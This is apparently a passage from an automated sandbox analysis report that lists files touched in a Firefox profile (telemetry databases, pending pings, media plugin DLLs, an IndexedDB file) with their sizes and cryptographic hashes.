SHA51210fdc0b3229eb52fbabb5d9495772f69d0c751eb63f51fd6309c8c07b6c8678966c927a4a499bd351809cce60bc24fb9618fb2b4863f282a3537df487873951d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\db\data.safe.tmp
Filesize15KB
MD5a7d6f991d2880349be0e6d9a03361085
SHA1a315d27efd50f4f30d9bac3c7485d2a282e50e10
SHA256320ea1083f5f3cda35249b406c651c7db8dbbb8e928facfe9db379fed9d6fa35
SHA512f46a8695781525b0ae82aa15dd4b54fe50815e0694558047adc8adb0e99dc1a683826bda87edc31d9a141a97eb640fc2aa09ac722bef60207a4e657edb8cff00
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD568678434b2907508948370dffe59479c
SHA1d50f940ca00a10c61d7159d5c39401c39eff5e63
SHA256081d62997d72e8fca1b5d1004b29f72db922cf3ef4dba8fd08edd51b43a4ae18
SHA5125465a2ae932e31a30eb172b5950823b8de230d71320e7d0b33c0ddb6625acec207168204b8f78830aa888cabd6b792097efea6d1a8c00982721bb57a4b2b2083
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\pending_pings\4f628f50-6f7b-4bef-ab3b-6a5e41b9c6b0
Filesize671B
MD5afdd8d35d543d62a2ac9dd3348c534e5
SHA19c06b37e69f00bd23ba2b2333e1471dbb7b84b37
SHA2561b6834c9853606fbf5aa3e6b2fd59fd8f39eb4494e553e414691d463f8634187
SHA512c4ed3cdf2108f05d63e5db7a81beab1efd66f282a1b0acc2c267e33238d170169444d060e9d799cf0d6308560930b472c9798ee725c81da4ab3d8679d1d16fd8
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\pending_pings\af34f68b-28f7-4317-bb5b-712a8b8360f5
Filesize28KB
MD5640bff84a40f5e328f7d71ff31979d59
SHA162939fa00df983e17391e0dc8deb511b2d2ddbed
SHA256765b875d80614792b55fce4ba249f07f0d5229c8c85a4b114c74f2115977fbfc
SHA512d6dbf03c0dffa5c6c8899a44e62a78851c079d9f236256179b654978b60eecc5b2fb0d652616ac53810146c4f8999f371545e1033be9947ffd13ff2c3cff1f72
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\pending_pings\d2a92048-242c-47b5-9812-de13a15b4772
Filesize982B
MD5a69cd65f2d08c978daf7660145c2fbbe
SHA160ac3fcd1be6529aa48f18e50048bfe878749997
SHA25695b259b0c9338f3999e8296e2291618f2139ec466b645184a74a87b196cd1bcd
SHA5120b9b6cdc540e0390e58a50299b5d6e2d1570390d31724603e4e091ca22205dd110e52abe56363fef2bf59fcfc63e4e6848945bbc61e5b815631c54b8ac8a4635
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
13KB
MD5f8b0330dda4a4f93d279e436fb9af93b
SHA14079e32b3899f73170b8fa88afd4e4e60644879c
SHA2561a1d2a650b6c50cff9515b8c2783b531c8127b5d341c1501a93b49ecb8f79a06
SHA5120aee5091432a9a2091f434403e9b2e486057d7997e0d9b890cf20fa896245d28511d026e693fef2638cff60f8fff5f169a3da3526a4f8b19a4302eb292005a95
-
Filesize
15KB
MD51ea4e25fb5a1b8844dea151b62a7f6d6
SHA1e2cdf2e4ae19f1b6e63c1ed6b8a2868c8e9247ca
SHA2561e24ccd4dd12e1210134fc5aef9fe85b8294d1870d0b6f1e2636fca6024df10d
SHA512e2abcca35482fc5d505a7bda20cf252c698b61c10b9f64ef4c68cbf3836826ff77479b183e72c431329b4ed9d2f723f344a36fdfe73958aabe049d810de82e5f
-
Filesize
10KB
MD52a714a6eaa18791520c2e9b9f8b38381
SHA1d593a9e08667569dae34273eef18f1d7ea591e9b
SHA2567c68a689556481c118ca2f42c32117b7ac8eaaa435d869d70b3072e08dc5aba3
SHA5127736aa7b2ae85a611c3b0876a7f811baa27899bf6d6b44b255e4b63d016346553db0f5999a54f3ff76cc72757816b7136bd8e1e1b86c12132212af92e4d65e2e
-
Filesize
10KB
MD5aec58172a2d33643f982a35e131be407
SHA196a5b701166b7034fa5d29eef32f0c3a4033f7ee
SHA25600c9c0f8b2ac1a8e0fa1e5e684d1ab2f71e89da9b48610553c7640604647431c
SHA512e19fb8224eb47ddc02eafd8056a390b9bcf06baca94ed3304f305b4d437314e986d3215055b183a6deb44415f20dc882e100b95d6f85e18ddb55e085e443ed57
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize1.5MB
MD56f22248bb79d7c3dbe34efc14feb5091
SHA1f9ab1c8d4a6a8d2ced1189d08f35d16fc8ae1a55
SHA2561a908a6a0214c312cb07d3ab1e4c03fa0b3d9862a4d78db88759c30ba4d5c8c0
SHA51277ee4db307d84f5323772a810b8fb3265312f9eff3e1a5d4f1afe07e2baab4ef8b86cc0246dc8e1e2af0c2026e72ac6ba07f79b2222dc55c17ab54b0389801e0
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize2.8MB
MD5a5b680f5bcd749ce3778012a29511e33
SHA12ef50dd388f57096423e5edcd4513af314133ff4
SHA256535c4b5c42c74fae10867f79a7b2c6345f877082210082190fae155b26b1f89a
SHA5122978a1020de76665ecc51f40bf47f596afc0993e9812924488b6563f41ade5efcd02748ca8550d4e5329577eecc0beddeba18277ef8bfb6868a2a3f8f0f38b2e